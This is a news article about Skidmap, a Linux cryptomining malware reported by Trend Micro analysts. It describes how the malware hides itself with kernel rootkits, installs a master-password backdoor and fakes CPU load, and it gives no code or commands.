Calling the crypto community! There’s a new threat in town that puts crypto assets in danger. Two threat analysts recently came across a new form of Linux malware, which mines cryptocurrency all the while managing to stay hidden.
Threat analysts, Augusto Remillano II and Jakub Urbanec, revealed their findings to the public in a post on Trend Micro, which is a known security intelligence blog. They went on to explain that cryptocurrency-mining malware is still a prevalent problem in the crypto space and with time malware are evolving, courtesy the efforts of cyber security criminals.
What makes their recently found malware, dubbed ‘Skidmap’ interesting, is the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar. While further explaining just how the malware keep itself to remain hidden, the analysts said that Skidmap does so by utilizing a rootkit, a program that is responsible for installing and executing code on a system without the consent or knowledge of the end user. Thus remaining undetectable by the infected system’s monitoring tools.
That is not where the malicious activity ends; the aforementioned kernel-mode rootkits can further be used by the attackers to acquire unrestricted access to the infected system. The malicious Skidmap is dangerously advanced because it also has the ability to set up a secret master password that grants it access to any user account present in the compromised system.
Moreover the analysts add that in addition to setting up ways to gain backdoor access to the targeted machine, Skidmap also creates another access point for its operators to gain access to the machine. The report further read:
The malware replaces the system’s pam_unix.so file with its own malicious version. This malicious file accepts a specific password for any users, thus allowing the attackers to log in as any user in the machine.
How does it Operate?
According to the report, initial infection starts in a Linux process, ‘crontab’, which is a standard process responsible for periodically scheduling timed jobs in Unix-like systems.
Then its on to the second stage where Skidmap installs numerous malicious binaries, the first of which minimize and weaken the infected machine’s security settings so that its in the clear to begin mining cryptocurrency unchecked.
There are other binaries involved in this process as mentioned before, one of which is responsible for dropping and installing several loadable kernel modules on the machine. The malware being fairly advanced, operates in complex ways to ensure that it is successful, like in order to ensure that the infected machine won’t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions. There is even a module that hides specific files to avoid detection.
Skidmap also fakes network traffic and CPU-related statistics in its attempt to mask its cryptocurrency mining operation. According to the report, high CPU usage is considered the primary red flag of illicit cryptocurrency mining; therefore a rootkit called netlink fakes the whole thing making the CPU’s load of the infected machine always appearing low. Which goes to show that apparently nothing is amiss in the system.
The complexity and the intricacy that the Skidmap works with, makes it extremely dangerous. According to the report:
Its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware.
If that wasn’t alarming enough, the report also adds that the malicious Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up.
While the report emphasizes on the dangers of the new Linux malware and cryptocurrency-mining threats in general, it doesn’t however indicate which cryptocurrency Skidmap illicitly mines.
2019 & Cryptojacking Incidents
The Linux malware might be new and by the looks of it, super advanced but the threat of cryptojacking, in general isn’t new. In fact unfortunately it remains one of the most prevalent problems plaguing the crypto ecosystem.
As BlockPublisher reported earlier in August, cybersecurity company McAfee Labs released a threat report in which it noted an increase in cryptojacking campaigns and ransomware attacks in Q1 of 2019. The report claimed that the first quarter of 2019 has seen a 29% increase in cryptojacking campaigns.